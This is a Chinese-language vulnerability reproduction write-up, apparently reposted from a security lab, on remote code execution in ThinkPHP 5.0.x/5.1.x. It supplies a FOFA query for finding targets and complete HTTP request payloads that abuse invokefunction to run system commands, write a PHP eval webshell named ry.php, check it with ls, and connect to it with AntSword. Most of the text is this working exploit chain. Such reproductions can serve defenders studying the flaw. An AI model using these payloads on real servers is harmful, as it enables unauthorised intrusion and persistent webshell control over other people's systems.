-ThinkPHP 5.x 的 RCE

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-ThinkPHP 5.x 的 RCE

0x01 阅读须知

0x02 漏洞描述

   ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。该漏洞在5.0.x和5.1.x的版本中，由于路由对控制器名控制不严谨导致或者Request类对调用方法控制不严加上变量覆盖，从而导致远程代码执行漏洞。

0x03 漏洞复现

漏洞影响:ThinkPHP 5.0.5-5.0.22、ThinkPHP 5.1.0-5.1.30

FOFA:“thinphp”

1.url后缀加入/index.php/?s=ddd显示thinkphp版本为V5.0.20

http://x.x.x.x:8080/index.php/?s=ddd

2.写入一句话木马，回显错误500（一句话木马需要url编码）

GET /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(%5C$_POST%5B'ry'%5D)?%3E%22%20%3E%20ry.php HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: AuthSession=dnVsaHViOjYyNTUwNEU2OtrW5YMzoY_6lZb4NqGJ2xaCO80f; PHPSESSID=44e90136f8b96d9bde7aa0ec62dc9c1b
Upgrade-Insecure-Requests: 1

3.通过执行系统命令ls查看是否存在ry.php的webshell，如图写入成功

GET /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: AuthSession=dnVsaHViOjYyNTUwNEU2OtrW5YMzoY_6lZb4NqGJ2xaCO80f; PHPSESSID=44e90136f8b96d9bde7aa0ec62dc9c1b
Upgrade-Insecure-Requests: 1

4.蚁剑连接http://x.x.x.x:8080/ry.php，密码为ry，得到一个webshell